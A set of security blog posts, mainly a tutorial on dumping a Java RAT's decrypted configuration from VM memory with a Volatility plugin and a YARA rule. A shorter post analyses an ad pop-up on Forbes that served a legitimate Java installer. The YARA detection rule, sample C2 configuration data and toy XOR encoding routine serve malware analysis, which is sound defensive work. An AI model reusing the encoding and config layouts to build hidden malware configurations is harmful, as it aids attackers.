Channel: Ghetto Forensics

Dumping Malware Configuration Data from Memory with Volatility



When I first started delving into memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd, and win32dd, made the job much easier (and more entertaining as we watched the feuds between mdd and win32dd).

In the early days, our analysis was basically performed with a hex editor. By collecting volatile data from an infected system, we'd attempt to map memory locations manually to known processes, an extremely frustrating and error-prone procedure. Even with the advent of graphical tools such as HBGary Responder Pro, which comes with a hefty price tag, I've found most of my time spent viewing raw memory dumps in WinHex.

The industry has slowly changed as tools like Volatility have gained maturity and become more feature-rich. Volatility is a free and open-source memory analysis tool that takes the hard work out of mapping and correlating raw data to actual processes. At first I shunned Volatility for its sheer amount of command line memorization, where each query required a specialized command line. Over the years, I've come to appreciate this aspect and the flexibility it provides to an examiner.

It's with Volatility that I focus the content for this blog post, to dump malware configurations from memory.

For those unfamiliar with the concept, it's rare to find static malware: that is, malware that has a plain-text URL in its .rdata section mixed in with other strings, and other data laid bare in plain sight. Modern malware tends to be more dynamic, allowing for configurations to be downloaded upon infection, or be strategically injected into the executable by its author. Crimeware (Carberp, Zeus) tends to favor the former, connecting to a hardcoded IP address or domain to download a detailed configuration profile (often in XML) that determines how the malware is to operate. What domains does it beacon to, on which ports, and with what campaign IDs - these are the items we determine from malware configurations.

Other malware relies upon a known block of configuration data within the executable, sometimes found within .rdata or simply in the overlay (the data after the end of the actual executable). Sometimes this data is in plain text; often it's encoded or encrypted. A notable example of this is in Mandiant's APT1 report on TARSIP-MOON, where a block of encrypted data is stored in the overlay. The point of this implementation is that an author can compile their malware, and then add in the appropriate configuration data after the fact.

As a method of improving the timeliness of malware analysis, I've been advocating for greater research and implementation of configuration dumpers. By identifying where data is stored within the file, and by knowing its encryption routine, one could simply write a script to extract the data, decrypt it, and print it out. Without even running the malware we know its intended C2 communications and have immediate signatures that we can then implement in our network defenses.

While this data may appear as a simple plaintext structure in a sample, often it's encoded or encrypted via a myriad of techniques. Often this may be a form of encryption that we, or our team, deemed too difficult to decrypt in a reasonable time. This is pretty common: advanced encryption or compression can take weeks to completely unravel and is often left for when there's downtime in operations.

What do we do, then? Easy, go for the memory.

We know that the malware has a decryption routine that takes in this data and produces decrypted output. By simply running the malware and analyzing its memory footprint, we will often find the results in plaintext, as the data has already been decrypted and is in use by the malware.

Why break the encryption when we can let the malware just decrypt it for us?



For example, the awesome people at Malware.lu released a static configuration dumper for a known Java-based RAT. This dumper, available here on their GitHub repo, extracts the encryption key and configuration data from the malware's Java ZIP and decrypts it. It uses Triple DES (TDEA), but once that routine became public knowledge, the author quickly switched to a new routine. The author has then continued switching encryption routines regularly to avoid easy decryption. Based on earlier analysis, we know that the data is decrypted as:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   70 6F 72 74 3D 33 31 33  33 37 53 50 4C 49 54 01   port=31337SPLIT.
00000016   6F 73 3D 77 69 6E 20 6D  61 63 53 50 4C 49 54 01   os=win macSPLIT.
00000032   6D 70 6F 72 74 3D 2D 31  53 50 4C 49 54 03 03 03   mport=-1SPLIT...
00000048   70 65 72 6D 73 3D 2D 31  53 50 4C 49 54 03 03 03   perms=-1SPLIT...
00000064   65 72 72 6F 72 3D 74 72  75 65 53 50 4C 49 54 01   error=trueSPLIT.
00000080   72 65 63 6F 6E 73 65 63  3D 31 30 53 50 4C 49 54   reconsec=10SPLIT
00000096   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000112   74 69 3D 66 61 6C 73 65  53 50 4C 49 54 03 03 03   ti=falseSPLIT...
00000128   69 70 3D 77 77 77 2E 6D  61 6C 77 61 72 65 2E 63   ip=www.malware.c
00000144   6F 6D 53 50 4C 49 54 09  09 09 09 09 09 09 09 09   omSPLIT.........
00000160   70 61 73 73 3D 70 61 73  73 77 6F 72 64 53 50 4C   pass=passwordSPL
00000176   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000192   69 64 3D 43 41 4D 50 41  49 47 4E 53 50 4C 49 54   id=CAMPAIGNSPLIT
00000208   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000224   6D 75 74 65 78 3D 66 61  6C 73 65 53 50 4C 49 54   mutex=falseSPLIT
00000240   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000256   74 6F 6D 73 3D 2D 31 53  50 4C 49 54 04 04 04 04   toms=-1SPLIT....
00000272   70 65 72 3D 66 61 6C 73  65 53 50 4C 49 54 02 02   per=falseSPLIT..
00000288   6E 61 6D 65 3D 53 50 4C  49 54 06 06 06 06 06 06   name=SPLIT......
00000304   74 69 6D 65 6F 75 74 3D  66 61 6C 73 65 53 50 4C   timeout=falseSPL
00000320   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000336   64 65 62 75 67 6D 73 67  3D 74 72 75 65 53 50 4C   debugmsg=trueSPL
00000352   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............

Or, even if we couldn't decrypt this, we know that it's beaconing to a very unique domain name and port which can be searched upon. Either way, we now have a sample where we can't easily get to this decrypted information. So, let's solve that.

By running the malware within a VM, we should have a logical file for the memory space. In VMware, this is a .VMEM file (or .VMSS for snapshot memory). In VirtualBox, it's a .SAV file. After running our malware, we suspend the guest operating system and then focus our attention on the memory file.

The best way to start is to simply grep the file (from the command line or a hex editor) for the unique C2 domains or artifacts. This should get us into the general vicinity of the configuration and show us the structure of it:

E:\VMs\WinXP_Malware>grep "www.malware.com" *
Binary file WinXP_Malware.vmem matches
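
If grep isn't handy on the analysis box, the same search can be sketched in a few lines of Python 3. This is only a minimal sketch and not part of the workflow above: the function name find_all is made up for illustration, and it maps the file with mmap so that a multi-gigabyte memory image isn't read into RAM all at once. It also reports the offsets of each hit, which grep's "Binary file matches" message does not.

```python
import mmap

def find_all(path, needle):
    """Return every file offset at which the byte string `needle` occurs."""
    offsets = []
    with open(path, 'rb') as f:
        # Map the file read-only; the OS pages it in on demand
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mem:
            pos = mem.find(needle)
            while pos != -1:
                offsets.append(pos)
                pos = mem.find(needle, pos + 1)
    return offsets

# Example call (path taken from the grep example above):
#   for offset in find_all('WinXP_Malware.vmem', b'www.malware.com'):
#       print('0x%08x' % offset)
```

Each offset can then be opened in a hex editor to look at the surrounding structure.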

With this known, we open the VMEM file and see a configuration that matches what we've previously seen. This tells us that the encryption routine changed but the configuration format did not, which is common. This is where we bring out Volatility.

Searching Memory with Volatility


We know that the configuration data begins with the text of "port=<number>SPLIT", where "SPLIT" is used to delimit each field. This can then be used to create a YARA rule of:

rule javarat_conf {
    strings: $a = /port=[0-9]{1,5}SPLIT/ 
    condition: $a
}

This YARA rule uses a regular expression (defined with forward slashes around the text) to search for "port=" followed by a number that is 1 to 5 digits long, then "SPLIT". This rule will be used to get us to the beginning of the configuration data. If there is no good way to match on the beginning, but only on something later in the data, that's fine. Just note the offset between where the data actually starts and where the YARA rule puts us.
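
Before pointing the rule at a memory image, the pattern itself can be sanity-checked against a known-good decrypted sample. The sketch below uses Python 3's built-in re module rather than YARA, purely as an assumption-laden stand-in: the two regex engines are not identical, but they agree on a pattern this simple. The names CONF_START and find_config_starts are hypothetical.

```python
import re

# Same pattern as the YARA rule, applied to raw bytes
CONF_START = re.compile(rb'port=[0-9]{1,5}SPLIT')

def find_config_starts(buf):
    """Return the offset of every match of the rule's pattern in `buf`."""
    return [m.start() for m in CONF_START.finditer(buf)]

# A few bytes shaped like the decrypted configuration shown earlier
sample = b'\x00\x00port=31337SPLIT\x01os=win macSPLIT\x01'
hits = find_config_starts(sample)
```

Here hits holds a single offset, 2, the position of the "p" in "port=". A port with six digits, or no digits at all, would not match.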

Let's test this rule with Volatility first, to ensure that it works:

E:\Development\volatility>vol.py -f E:\VMs\WinXP_Malware\WinXP_Malware.vmem yarascan -Y "/port=[0-9]{1,5}SPLIT/"
Volatile Systems Volatility Framework 2.3_beta
Rule: r1
Owner: Process VMwareUser.exe Pid 1668
0x017b239b  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 2e   port=31337SPLIT.
0x017b23ab  0a 30 30 30 30 30 30 31 36 20 20 20 36 46 20 37   .00000016...6F.7
0x017b23bb  33 20 33 44 20 37 37 20 36 39 20 36 45 20 32 30   3.3D.77.69.6E.20
0x017b23cb  20 36 44 20 20 36 31 20 36 33 20 35 33 20 35 30   .6D..61.63.53.50
Rule: r1
Owner: Process javaw.exe Pid 572
0x2ab9a7f4  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 01   port=31337SPLIT.
0x2ab9a804  6f 73 3d 77 69 6e 20 6d 61 63 53 50 4c 49 54 01   os=win.macSPLIT.
0x2ab9a814  6d 70 6f 72 74 3d 2d 31 53 50 4c 49 54 03 03 03   mport=-1SPLIT...
0x2ab9a824  70 65 72 6d 73 3d 2d 31 53 50 4c 49 54 03 03 03   perms=-1SPLIT...

One interesting side effect of working within a VM is that some data may appear under the space of VMwareUser.exe. That data is showing up somewhere outside of the context of our configuration. We could try to change our rule, but the simpler solution within the plugin is to just rule out hits from VMwareUser.exe and only allow hits from executables that contain "java".

Now that we have a rule, how do we automate this? By writing a quick and dirty plugin for Volatility.

Creating a Plugin


A quick plugin that I'm demonstrating is composed of two primary components: a YARA rule, and a configuration dumper. The configuration dumper scans memory for the YARA rule, reads memory, and displays the parsed results. An entire post could be written on just this file format, so instead I'll post a very generic plugin and highlight what should be modified. I wrote this based on the two existing malware dumpers already released with Volatility: Zeus and Poison Ivy.

Jamie Levy and Michael Ligh, both core developers on Volatility, provided some critical input on ways to improve and clean up the code.


# JavaRAT detection and analysis for Volatility - v 1.0
# This version is limited to JavaRAT's clients 3.0 and 3.1, and maybe others
# Author: Brian Baskin <brian@thebaskins.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

import volatility.plugins.taskmods as taskmods
import volatility.win32.tasks as tasks
import volatility.utils as utils
import volatility.debug as debug
import volatility.plugins.malware.malfind as malfind
import volatility.conf as conf
import string

try:
    import yara
    has_yara = True
except ImportError:
    has_yara = False


signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}


config = conf.ConfObject()
config.add_option('CONFSIZE', short_option='C', default=256,
                  help='Config data size',
                  action='store', type='int')
config.add_option('YARAOFFSET', short_option='Y', default=0,
                  help='YARA start offset',
                  action='store', type='int')

class JavaRATScan(taskmods.PSList):
    """ Extract JavaRAT Configuration from Java processes """

    def get_vad_base(self, task, address):
        for vad in task.VadRoot.traverse():
            if address >= vad.Start and address < vad.End:
                return vad.Start
        return None

    def calculate(self):
        """ Required: Runs YARA search to find hits """
        if not has_yara:
            debug.error('Yara must be installed for this plugin')

        addr_space = utils.load_as(self._config)
        rules = yara.compile(sources=signatures)
        for task in self.filter_tasks(tasks.pslist(addr_space)):
            if 'vmwareuser.exe' == task.ImageFileName.lower():
                continue
            if not 'java' in task.ImageFileName.lower():
                continue
            scanner = malfind.VadYaraScanner(task=task, rules=rules)
            for hit, address in scanner.scan():
                vad_base_addr = self.get_vad_base(task, address)
                yield task, address

    def make_printable(self, input):
        """ Optional: Remove non-printable chars from a string """
        input = input.replace('\x09', '') # string.printable doesn't remove tabs
        return ''.join(filter(lambda x: x in string.printable, input))

    def parse_structure(self, data):
        """ Optional: Parses the data into a list of values """
        struct = []
        items = data.split('SPLIT')
        for i in range(len(items) - 1): # Iterate this way to ignore any slack data behind last 'SPLIT'
            item = self.make_printable(items[i])
            field, value = item.split('=', 1) # split on the first '=' only, in case a value contains one
            struct.append('%s: %s' % (field, value))
        return struct


    def render_text(self, outfd, data):
        """ Required: Parse data and display """
        delim = '-=' * 39 + '-'
        rules = yara.compile(sources=signatures)
        outfd.write('YARA rule: {0}\n'.format(signatures))
        outfd.write('YARA offset: {0}\n'.format(self._config.YARAOFFSET))
        outfd.write('Configuration size: {0}\n'.format(self._config.CONFSIZE))
        for task, address in data: # iterate the yield values from calculate()
            outfd.write('{0}\n'.format(delim))
            outfd.write('Process: {0} ({1})\n\n'.format(task.ImageFileName, task.UniqueProcessId))
            proc_addr_space = task.get_process_address_space()
            conf_data = proc_addr_space.read(address + self._config.YARAOFFSET, self._config.CONFSIZE)
            config = self.parse_structure(conf_data)
            for i in config:
                outfd.write('\t{0}\n'.format(i))

This code is also available on my GitHub.

In a nutshell, you first have a signature to key on for the configuration data. This is a fully qualified YARA signature, seen as:

signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}

This rule is stored in a Python dictionary format of 'rule_name' : 'rule contents'.

The plugin allows a command line argument (-Y) to set the YARA offset. If your YARA signature hits 80 bytes past the beginning of the structure, then set this value to -80; if it hits 80 bytes before the beginning, set it to 80. This can also be hardcoded by changing the default value.

There is a second command line argument (-C) to set the size of data to read for parsing. This can also be hardcoded. The size will vary based upon the malware; I've seen some configurations that were multiple kilobytes in size.
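
The arithmetic behind -Y and -C is small enough to sketch on its own. The following Python 3 snippet is an illustration only: config_window and read_config are hypothetical names, and a plain bytes object stands in for the process address space that the plugin reads from.

```python
def config_window(hit_address, yara_offset=0, conf_size=256):
    """Return (start, end) of the bytes to read for a given YARA hit."""
    start = hit_address + yara_offset
    if start < 0:
        raise ValueError('offset points before the start of memory')
    return start, start + conf_size

def read_config(memory, hit_address, yara_offset=0, conf_size=256):
    """Slice the configuration block out of a bytes-like `memory` buffer."""
    start, end = config_window(hit_address, yara_offset, conf_size)
    return memory[start:end]

# Signature hits at 100, but the structure really begins 80 bytes earlier
window = config_window(100, yara_offset=-80, conf_size=256)
```

With those values, window covers bytes 20 through 275, so the read begins at the true start of the structure rather than at the signature.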

Rename the class, seen here as JavaRATScan, to whatever fits for your malware. It has to be a unique name. Additionally, the """ """ docstring below the class name contains the description which will be displayed on the command line.

I do have an optional rule to limit the search to a certain subset of processes. In this case, only processes that contain the word "java" - this is a Java-based RAT, after all. It also skips any process of "VMWareUser.exe".

The plugin contains a parse_structure routine that is fed a block of data. It then parses it into a list of items that are returned and printed to the screen (or file, or whatever output is desired). This will ultimately be unique to each malware, and the optional make_printable() function is one I made to clean up the non-printable characters from the output, allowing me to extend the set of blocked characters.
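
To experiment with the parsing logic outside of Volatility, here is a standalone sketch of the same idea in Python 3, working on bytes. It is an adaptation under a few assumptions rather than the plugin's code: it returns (field, value) tuples, drops every non-printable byte including tabs and newlines, and silently skips chunks that contain no "=".

```python
import string

# Printable ASCII minus the whitespace control characters; space is kept
PRINTABLE = set(string.printable.encode('ascii')) - set(b'\t\n\r\x0b\x0c')

def make_printable(raw):
    """Drop padding and other non-printable bytes, then return text."""
    return bytes(b for b in raw if b in PRINTABLE).decode('ascii')

def parse_structure(data):
    """Split a decrypted blob into (field, value) pairs."""
    pairs = []
    # Everything after the last 'SPLIT' is slack, so skip the final chunk
    for chunk in data.split(b'SPLIT')[:-1]:
        item = make_printable(chunk)
        if '=' not in item:
            continue  # not a key=value field; ignore it
        field, value = item.split('=', 1)
        pairs.append((field, value))
    return pairs

blob = (b'port=31337SPLIT\x01os=win macSPLIT\x01mport=-1SPLIT\x03\x03\x03'
        b'ip=www.malware.comSPLIT' + b'\x09' * 9 + b'slack')
fields = parse_structure(blob)
```

The padding bytes that trail each field in the memory dump (0x01, 0x03, 0x09 and so on) end up at the front of the next chunk after the split, which is why each chunk is cleaned before it is split on "=".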

Running the Plugin


As a rule, I place all of my Volatility plugins into their own unique directory. I then reference this upon runtime, so that my files are cleanly segregated. This is performed via the --plugins option in Volatility:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins

After specifying a valid plugins folder, run vol.py with the -h option to ensure that your new scanner appears in the listing:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins -h
Volatile Systems Volatility Framework 2.3_beta
Usage: Volatility - A memory forensics analysis platform.

Options:
...

        Supported Plugin Commands:

                apihooks        Detect API hooks in process and kernel memory
...
                javaratscan  Extract JavaRAT Configuration from Java processes
...

The names are automatically populated based upon your class names. The text description is automatically pulled from the "docstring", which is the comment that directly follows the class name in the plugin. 

With these in place, run your scanner and cross your fingers:






For future use, I'd recommend prepending your plugin name with a unique identifier to make it stand out, like "SOC_JavaRATScan". Prepending with a "zz_" would make the new plugins appear at the bottom of Volatility's help screen. Regardless, it'll help group the built-in plugins apart from your custom ones.

The Next Challenge: Data Structures


The greater challenge is when data is read from within the executable into a data structure in memory. While the data may have a concise and structured form when stored in the file, it may be transformed into a more complex and unwieldy format once read into memory by the malware. Some samples may decrypt the data in-place, then load it into a structure. Others decrypt it on-the-fly so that it is only visible after loading into a structure.

For example, take the following fictitious C2 data stored in the overlay of an executable:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 A2 A0 AC B1 A0 A8 A6  AF 17 89 95 95 91 DB CE   ................
00000016   CE 96 96 96 CF 84 97 88  8D 92 88 95 84 CF 82 8E   ................
00000032   8C 03 D5 D5 D2 08 B1 A0  B2 B2 B6 AE B3 A5 05 84   ................
00000048   99 95 93 80                                        ....

By reversing the malware, we determine that this is composed of Pascal strings XOR-encoded with 0xE1. Pascal strings are length-prefixed, so applying the correct decoding would result in:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 43 41 4D 50 41 49 47  4E 17 68 74 74 70 3A 2F   .CAMPAIGN.http:/
00000016   2F 77 77 77 2E 65 76 69  6C 73 69 74 65 2E 63 6F   /www.evilsite.co
00000032   6D 03 34 34 33 08 50 41  53 53 57 4F 52 44 05 65   m.443.PASSWORD.e
00000048   78 74 72 61                                        xtra

This is a very simple encoding routine, which I made with just:

items = ['CAMPAIGN', 'http://www.evilsite.com', '443', 'PASSWORD', 'extra']
data = ''
for i in items:
    data += chr(len(i))
    for x in i: data += chr(ord(x) ^ 0xE1)
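
Going the other direction, a decoder for this fictitious format might look like the following Python 3 sketch. The function name decode_pascal_xor is made up for illustration, and the input bytes are copied from the encoded hex dump above. As in that dump, the sketch assumes the length byte is stored as-is and only the string bodies are XORed.

```python
def decode_pascal_xor(blob, key=0xE1):
    """Decode length-prefixed strings whose bodies are XORed with `key`."""
    items = []
    pos = 0
    while pos < len(blob):
        length = blob[pos]                      # length byte is not encoded
        body = blob[pos + 1:pos + 1 + length]
        if len(body) < length:
            break                               # truncated trailing data
        items.append(bytes(b ^ key for b in body).decode('ascii', 'replace'))
        pos += 1 + length
    return items

# Bytes from the encoded overlay dump
ENCODED = bytes.fromhex(
    '08 A2 A0 AC B1 A0 A8 A6 AF 17 89 95 95 91 DB CE '
    'CE 96 96 96 CF 84 97 88 8D 92 88 95 84 CF 82 8E '
    '8C 03 D5 D5 D2 08 B1 A0 B2 B2 B6 AE B3 A5 05 84 '
    '99 95 93 80'
)
decoded = decode_pascal_xor(ENCODED)
```

The decoded list comes back as the same five strings that were fed to the encoder: the campaign ID, URL, port, password, and the extra field.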


Data structures are a subtle and difficult component of reverse engineering, and vary in complexity with the skill of the malware author. Unfortunately, data structures are some of the least shared indicators in the industry.

Once completed, a sample structure could appear similar to the following:

struct Configuration
{
    CHAR campaign_id[12];
    CHAR password[16];
    DWORD heartbeat_interval;
    CHAR C2_domain[48];
    DWORD C2_port;
}

With this structure, and the data shown above, the malware reads each variable in and applies it to the structure. But, we can already see some discrepancies: the items are in a differing order, and some are of a different type. While the C2 port is seen as a string, '443', in the file, it appears as a DWORD once read into memory. That means that we'll be searching for 0x01BB (or 0xBB01 based on endianness) instead of '443'. Additionally, there are other values introduced that did not exist statically within the file to contend with.
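
To make the endianness point concrete, this short Python 3 sketch uses the standard struct module to show the exact four-byte patterns a DWORD of 443 would produce in memory. The helper name dword_patterns is hypothetical.

```python
import struct

def dword_patterns(value):
    """Return the little- and big-endian byte patterns for a 32-bit value."""
    return struct.pack('<I', value), struct.pack('>I', value)

little, big = dword_patterns(443)
# little == b'\xbb\x01\x00\x00'   (typical for x86 Windows malware)
# big    == b'\x00\x00\x01\xbb'
```

Either pattern is a poor signature on its own, since such short byte sequences occur all over memory, so it helps to anchor on a neighboring string field and read the DWORD at a known distance from it.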

An additional challenge is that, depending on how the memory was allocated, there could be slack data found within the structure. This could be seen if the malware sample allocates memory with malloc() without a memset(), rather than using calloc().

When read and applied to the structure, this data may appear as the following:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   43 41 4D 50 41 49 47 4E  00 0C 0C 00 00 50 41 53   CAMPAIGN.....PAS
00000016   53 57 4F 52 44 00 00 00  00 00 00 00 00 00 17 70   SWORD..........p
00000032   68 74 74 70 3A 2F 2F 77  77 77 2E 65 76 69 6C 73   http://www.evils
00000048   69 74 65 2E 63 6F 6D 00  00 00 00 00 00 00 00 00   ite.com.........
00000064   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 01 BB                                        ...»

We can see from this that our strategy changes considerably when writing a configuration dumper. The dumper won't be written based upon the structure in the file, but instead upon the data structure in memory, after it has been converted and formatted. We'll have to change our parser slightly to account for this. For example, if you know that the Campaign ID is 12 bytes, then read 12 bytes of data and find the null terminator to pull the actual string.
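
A parser for the in-memory form could be sketched with Python 3's struct module, as below. The field sizes come from the sample Configuration structure; everything else is an assumption for illustration: the names CONFIG_FORMAT, c_string and parse_config are hypothetical, the layout is assumed to have no compiler padding, and big-endian DWORDs are used only because that is how the example dump shows the port. Real x86 malware would normally need '<' instead of '>'.

```python
import struct

# 12 + 16 + 4 + 48 + 4 = 84 bytes; '>' means big-endian with no padding
CONFIG_FORMAT = '>12s16sI48sI'

def c_string(field):
    """Return the text before the first NUL, ignoring any slack after it."""
    return field.split(b'\x00', 1)[0].decode('ascii', 'replace')

def parse_config(data):
    """Unpack a raw memory block into a dict of configuration values."""
    size = struct.calcsize(CONFIG_FORMAT)
    campaign, password, heartbeat, domain, port = struct.unpack(
        CONFIG_FORMAT, data[:size])
    return {
        'campaign_id': c_string(campaign),
        'password': c_string(password),
        'heartbeat_interval': heartbeat,
        'C2_domain': c_string(domain),
        'C2_port': port,
    }

# Test block built for this example; note the slack bytes after 'CAMPAIGN'
block = struct.pack(CONFIG_FORMAT, b'CAMPAIGN\x00\x0c\x0c\x00', b'PASSWORD',
                    6000, b'http://www.evilsite.com', 443)
parsed = parse_config(block)
```

Cutting each fixed-width field at its first NUL is what keeps slack bytes, like the 0x0C values after the campaign ID, out of the parsed output.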

This just scratches the surface of what you can do with encrypted data in memory, but I hope it can inspire others to use this template code to make quick and easy configuration dumpers to improve their malware analysis.


Of Malware and Adware: Why Forbes Did Not Serve Me Malware

Web-based advertising is always a hot topic for discussion, debate, and outright argument. One realizes that the Internet to which we've grown accustomed is reliant on ads; after all, Google is an advertisement company.

In the recent past we've seen articles on malvertising targeted using Skype and more recently using the New York Times and BBC. Soon after, comparisons were made between these attacks and an incident I noted in January regarding Forbes.com. Those comparisons are ongoing, motivating me to write this post.

While Forbes did experience a malvertising event last year, these attacks are nowhere near the same as the event I posted in January. That people claim so shows a general lack of education, even among security practitioners, of malware vs adware vs PUP, and valid threats vs nuisances.

Forbes did not serve "malware" and cannot be compared to these incidents.

To explain this in detail, let's discuss how my event came to be.




Earlier this year Forbes.com LLC decided to test blocking browsers with ad-blockers, a move that split the discussion to its core. More and more of our online activity focuses on news articles, blog posts, and other write-ups. Everything I write on this blog takes considerable time and effort, sometimes weeks of development. But, as I have a day job, I do not need to host advertisements. Others, with greater use of words, try to eke out a salary based on the ads that frame their writing. I understand and empathize with this. As a published author I'm used to making no money from royalties while peers torrent the eBook right in front of me.

A mid-December gift of Fallout 4 for the PS4 was something that I greatly appreciated. Especially as it was a gift that I bought myself for my birthday. After having it sit for a few weeks while I was inundated with work, I opened it at New Years and tried early to find articles to give a quick leg-up at the beginning.

A search for early armor referred me to a Forbes article, One Of The Best Pieces Of Armor In 'Fallout 4' Isn't What You Think. Upon loading this page I received the dreaded message that's gone viral in the past few months:



Your mind freezes. Surprise turns to distrust, then pondering. As security people, we then begin to weigh the options. I don't like ads, and use AdBlock Plus to disable them everywhere I go. However, I also would like to access the information on that website. In response, I disabled my adblock for Forbes.com, continued to the article, and immediately had a pop-under window appear.








Well, that's disconcerting. I chuckle and take a screenshot. I then look over this page in detail. Some basic HTML, some JavaScript, with all notable scripts shared for perusal. Of note:


<script type="text/javascript">
function doDownload()
{
    trigger_dl(false,21,13526,'True','setup.exe');
}
</script>
...
function trigger_dl(redirect,lpm_id,rotation_index,rotate,filename)

This was really interesting. So, I grabbed the resulting setup.exe, which saved as jre-8u25-windows-i586.exe. I took an MD5 hash of the file, 2CDD85286C5531557F3F20A7CAFA7291, and compared it to the known good hashes from Oracle. It was clean.
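
For anyone wanting to repeat that check, hashing a download and comparing it against a vendor's published values takes only a few lines. This is a generic Python 3 sketch with hypothetical function names, not the exact tool used here; the list of known good hashes must come from the vendor and is not reproduced in this post.

```python
import hashlib

def md5_of_file(path, chunk_size=1 << 20):
    """Return the uppercase hex MD5 of a file, read in 1 MB chunks."""
    digest = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest().upper()

def matches_known_good(path, known_hashes):
    """True if the file's MD5 appears in the list of published hashes."""
    return md5_of_file(path) in {h.upper() for h in known_hashes}
```

MD5 is fine for matching against a published value like this, though a SHA-256 comparison is preferable whenever the vendor provides one.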

It's a bit baffling. It was simply a page serving up a legitimate copy of the Java Runtime, albeit one that was over a year old. Maybe the rotation_index in the JavaScript allowed for the site to be "enabled" at certain times and provide Java at all other times? Maybe they wanted to intentionally install old Java? There's no clear answer here.

I did not feel threatened. This was interesting and mildly funny.

While we have a growing population of researchers who tweet major vulnerabilities in real-time, proper threats should be taken up directly with the organization and not be made public. I do not consider this a proper threat, so I posted it to Twitter without a care, which was a mistake.

It was a silly pop-up with a legitimate application. However, in my flippant tweet about the event, due to the space limitation of Twitter, I called it malware. I then followed up within seconds about what that meant, what the file was, and how it was really just a page for 'crapware'. I posted a trace, and had history data from my Chrome cache to review.


Here is what is clear:

The advertisement was not malware. 

Forbes is still whitelisted from my ad-blocker.


We have no evidence of what exactly created this pop-up.



The last point is frustr

Where the community responded


Forbes almost immediately reached out and we started a dialog. We shared logs, events, and descriptions of the ad. Though I had a valid "Referrer:" in the web page, their breakdown of their ad system (which is actually a very complex and well thought out system) showed that it just couldn't exist. I had a page that said it came from Forbes, and Forbes had evidence that no page should have that referrer. We were stuck without any evidence.

In that time, the tweet went viral. I hate viral tweets. People focused on the word "malware" and ignored all of my follow-up clarifications. Suddenly my name and background were being leveraged as fodder for people's own battles. Just one example is below:


Things became heated on Twitter, but in the news it was fairly calm. Forbes published an article that delved into the ad-blocking debate and the infometrics it created: Inside Forbes: Our Ad Block Test Stirs Up Emotions, Then Brings Learnings and New Data.

Where Engadget pushed things downhill


On a Friday morning I had just walked out of a barber and was preparing to meet a coworker for lunch when I received an automated tweet. My Twitter handle was referenced in an Engadget article. I pulled up the article and my mouth dropped.

In an article titled You say advertising, I say block that malware, a writer for Engadget, Violet Blue, jumped to severe conclusions and grouped my incident in with ransomware, drive-bys, and zero-day attacks. This writer worked directly off my single tweet and willfully ignored all of the further details. They also did not reach out to me for comment or clarification. That article became the source for dozens of additional articles, with a current 6,693 shares, all berating Forbes for "serving malware".

My initial response was to go onto the article and create a comment giving the rest of the story. It was immediately downvoted and currently sits at a -4 score. Similar reactions were received on Reddit and Slashdot.

A poorly resourced and written article by Engadget caused a minor issue to become a misunderstood stampede. Even weeks later, some Forbes writers were so outraged by that article that they were considering quitting their jobs. A letter written to Engadget in complaint of the article received no response or feedback.

And so that article sits, spewing misinformation, and providing fodder for continued comparisons to actual malvertising attacks.

The incident was overall very frustrating. I audited my extensions and software (it's a work Mac, with almost no apps installed). I turned all ad blocking off for two weeks, and never saw a pop-up again. To their end, I, again, never saw a pop-up again with ad-blocking disabled. And that's where things ended. I did not claim they were infecting me, or hosting malware, or were negligent in their approach; yet, those words were attributed to me.

Lessons learned:


1. Don't trust the press.
2. What you consider a mild irritation can be misinterpreted as a major incident.
3. If something could be taken the wrong way, try to directly communicate with the organization.
4. No one reads the fine print. They only want the flashy title.
5. Don't trust your peers when they have their own ax to grind.
6. Choose your words wisely, especially when you have to choose shorter synonyms for Twitter.

Solving the 2015 FLARE On Challenges

The second annual FLARE On is a reverse engineering challenge put forth by the FireEye Labs Advanced Reverse Engineering (FLARE) team. While accepted as a very advanced and tactical recruiting method, it resonates with those who love CTF challenges.

In 2014 the inaugural FLARE On presented seven challenges. As a finisher, you can read my write-up here. Each participant has a different take on the challenges. Each person has different methods, skills, and strengths. Mine are forged by years of forensics, log analysis, and working a mission where results are required regardless of ability, training, or excuses. At the end of this post I've linked to other write-ups that I've seen.

Let's begin by setting a level of expectation. You are reading a blog named GhettoForensics. The ultimate goal of Ghetto Forensics is to get by with whatever tools and knowledge you have to complete a mission. You will not find first-rate techniques and solutions here. In fact, when presented with multiple options, I often went out of my way to choose the worst, most cringe-worthy option available. For the lulz, and to show that you don't need advanced reverse engineering training and experience to survive the industry. I hope you enjoy.

For simplicity's sake, unless necessary, all IDA output will be shown as decompiled.

